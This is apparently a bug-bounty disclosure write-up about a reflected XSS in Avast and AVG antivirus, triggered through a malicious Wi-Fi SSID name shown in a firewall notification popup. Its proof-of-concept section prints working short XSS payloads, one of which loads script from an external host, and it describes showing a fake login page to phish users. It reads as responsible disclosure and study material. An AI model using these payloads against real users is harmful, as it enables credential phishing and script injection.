5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)

CVE-2019–18653 & CVE-2019–18654: The story when Reflected XSS was triggering from SSID Name (It also affected AVG AntiVirus since basically the code of the those products was mostly “merged”).

YoKo Kho
YoKo Kho
Oct 29 · 9 min read

بسم الله الرحمن الرحيم

So, this article will be explained in two ways, which are the one that tell the story how I got it and the one that trying to explain the basic and the reference.Readers could also read the TL;DR section directly.

I. TL;DR

1.1. Create an SSID Name with simple XSS Payload (with maximum = 32 characters). We can use BruteLogic and s0md3v short XSS payload (thanks man!).

1.2. Connecting your Windows OS (with installed and active Avast AntiVirus) to those SSID and wait for the Avast’s Network Notification Feature triggered the XSS Payload.

Triggering the XSS via SSID Name

1.3. Reporting to Avast and confirmed as a valid issue within around 2 days. And few months later, they judged if the issue to be rather serious and decided to reward the report with $5000.


II. Behind the Scene about How I got this Issue

Few years ago, I read one of the nice article from one of the bug hunter when he just got much of XSS issue at big names company by put the XSS payload at his SSID name (I really lost those bookmark because one thing). In short, when he surfing to much apps, he got so many app that reflecting the value of his SSID name (and the XSS was triggered). From there, then I start to use the XSS payload as my SSID name (on my OS X).

So, few months ago, I got a notebook (with windows inside) from the office that I working for. I installed anything that I need from tethering connection and leave the Avast AntiVirus for the last (at home). At home, I continue the installation and everything goes right.

Until someday I use this notebook again for training purpose. In the middle of training (day 3 or day 4), I having an issue with the used connection. So, suddenly this notebook connect to my tethering connection automatically (with Avast has been installed), and within few second, I got a popup alert with “https://local.avast.com” appears at my desktop.

To be honest, I have no idea how it could works like that. Lucky me, there is a recording video at the class and I asked for copying the talks between those period of time. Trying to figure how those one appears, finally I got the answer at the next day. Those XSS was triggered because because the embedded “Network Notification Feature” (Firewall) at Avast (specifically for Internet Security and Premiere Edition) was reflecting the SSID name and didn’t do the sanitation yet.

Then I create the report at those night, and got a reply around 2 days that confirmed if the issue was valid.


III. Abstract

As quoted from Avast’s official site, Avast as one of the largest security companies in the world that using next-gen technologies to fight cyber-attacks in real time, is dedicated to creating a world that provides safety and privacy for all, no matter who you are, where you are, or how you connect.

With the much of research that conduct by Avast, Avast trying to reach the best endpoint protection for every user. One of their feature that could be seen is “Firewall” feature that could be used easily to manage the in and out traffic.

By default, this Firewall feature could give an alert (popup notification) to user when they connect to new network. For example, as the shown picture below, it shows that the user just connect into the wireless network with “My Hotspot” as SSID name.

Popup Notification when Connected to new Network

After the popup showing up, then the user could choose the type of network from the SSID that they connected, such as “Private” network or “Public” network.

But then, the problem exists when the notification popup didn’t filter the special character that reflected from the SSID name yet. In other words, an Attacker could trigger the XSS at the client via the “notification popup” by using the malicious SSID name.


IV. Introduction

4.1. Cross Site Scripting (XSS)
To put it simply, this kind of vulnerability is a vulnerability that could “let” an Attacker to be able to execute a code in the input section that hasn’t implemented filtering for special characters such as “ > < : / ; etc. In contrast to Stored XSS that “saves” the executed code, Reflected XSS actually doesn’t save this script at all, so the “target” is expected and required to visit the URL that has been “injected” by additional contents from an Attacker.

At this situation, Avast has reflected the input (which is from the SSID Name) into the notification popup (every time the user changing the connection). When the SSID name contain the client-side script (such as javascript), then the notification will trigger the script that could triggered the XSS vulnerability.

One of the good thing, even the SSID name has around 32 characters limitation, then we still could bypass it with calling the short URL. Credits to Brute Logic and S0md3v, Thanks man!


4.1.1. The Short XSS Payload
At the first time I got a popup alert, I have no idea how to triggering it more. Then Alhamdulillah, so lucky that I remember if I ever read the publication that made by “Brute Logic” and “S0md3v” related the short XSS Payload. And cool thing is, it works!

If you looking for the great and creative XSS payload, then I recommending both of this research:
https://brutelogic.com.br/blog/shortest-reflected-xss-possible/
https://github.com/s0md3v/AwesomeXSS

And yes (absolutely), there are much researchers out there that still sharing another great and creative payload that you could follow.


4.2. Research Story related things that could be Executed by using the Malicious SSID Name
As explained previously, I realized this trick from the write-up that has been released by one of the bug hunter (I’m really sorry, I really lost those bookmark because one thing). By those one, then I finally knew if the research about this area has been conduct very detail by Deral Heiland 2013 ago. He has published the research at BlackHat Europe 2013.

So, for the deep research and knowledge about this, you could refer to his presentation. Very recommended.


4.3. Affected Version and Testing Environment
Avast:
The affected version of this vulnerability could be found at Avast Internet Security version 19.3.2369 (build 19.3.4241.440). It also affects the Avast Free Antivirus the premiere one.

And from the AVG side: the issue was affected the AVG Internet Security version 19.3.3084 (build 19.3.4241.440).

As a little note, both of issue has been reproduced at the Windows 10 environment (latest patch - per March 22nd, 2019).


V. Summary of Issue

As it has been described before, the security problem in this report is the vulnerability that could allow an Attacker to trigger the XSS at the client via the “notification popup” by using the malicious SSID name.

At this situation, an Attacker could also show the fake login page (for example with Avast / AVG logo) via the “notification popup” and user will not feel suspicious since there is no URL that could be seen / detected when the script triggering the fake login page.

Sample Case to Triggering the Fake Login Page - Avast
Sample Case to Triggering the Fake Login Page - AVG

VI. Proof of Concept

For completing the explanation, there are few things that should be done to reproducing this issue. Here are the step by step that should be prepare:

6.1. Create the SSID with the simple javascript as a name of those SSID. For example: ><img src=x onerror=prompt(1)>
The basic explanation of this script is to triggering the popup alert with “1” as character.

6.2. Ensure if the victim to connect into those prepared SSID;

6.3. After victim connect into the prepared SSID, then just wait few seconds. The popup notification will be shown, and the script will be triggered:

The Script has been Triggered via Notification Popup - Avast
The Script has been Triggered via Notification Popup - AVG

6.4. Since the SSID name is limited into the 32 characters size, then we should tricks the script by using the short URL service. For example, we try to triggering the login form from other portal. The used script is: ><embed src=//tiny.cc/XYZABCX> (you also could use bit.ly).

Triggering the Login Form from other Portal to Notification Popup
Triggering the Login Form from other Portal to Notification Popup II

And the good thing, you also could triggered the script from another external URL (credits to s0md3v). Here is an example: ><embed src=//14.rs>

Triggering the script by Using the External Script

VII. Additional Information

For completing the explanation, here is the simple PoC video that could be seen about the works:

PoC Video - Triggering the XSS Payload via SSID Name

VIII. Reporting Timeline

  • Mar 21st, 2019: Found the issue and don’t know the root cause yet;
  • Mar 22nd, 2019: Found the problem, then create and send the report via bugs@avast.com;
  • Mar 25th, 2019: Send the information if AVG is affected too;
  • Mar 25th, 2019: Avast replied and confirmed the bug. They said if they will release a fix soon;
  • Mar 25th, 2019: Avast replied if that not surprising (if AVG was affect with the same issue). They give a high level explanation nicely.
  • May 24th, 2019: Avast said if the issue was fixed (in Avast 19.4) and already release. They also said if they will give more details when the reward is decided.
  • June 12th, 2019: Avast judged this issue to be rather serious and decided to reward the report with $5000. (Really amazing).
Reward Decision from Avast

This one is really break the record that I have in one reward payment. Also, the decision was really surprising me. At that time, I still didn’t believe it until those numbers really come into my Paypal account.

For Avast: Thank you so much for the surprising reward and the amazing program! Really appreciate. I have lost my words to thanking them.

  • Oct 30th, 2019: CVE-2019–18653 has been assigned for issue at Avast and CVE-2019–18654 has been assigned for issue at AVG.

IX. The Closing

Well, as the readers could see, this one is the thing that I never imagine (triggering the XSS at Desktop App). Few simple notes that maybe I could share (with my limited knowledge) are:

  • Always try to bookmark everything that you read. Put a note and comeback when you would like to use those tricks to your target. At this case, someday I read and save the publication that has been made by Brute Logic and s0md3v. When I meet the hard situation (for example to triggering the XSS with limited character), the I back to their write-up and open my note.
  • Even though looks silly, but would better if you put your SSID name with (for example) XSS Payload. I have put it for few years (since the first time I read the write-up that published by a bug hunter out there, thank man!), but I found it triggered at 2019 at the Desktop App in Windows OS (it doesn’t affect the OS X version of Avast anyway).

Also, another vector that I learned from this one are:



InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

YoKo Kho

Written by

YoKo Kho

Bug Hunter | OSCP | One of 2018 BugCrowd MVP | https://twitter.com/YoKoAcc | https://bugcrowd.com/YokoKho

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade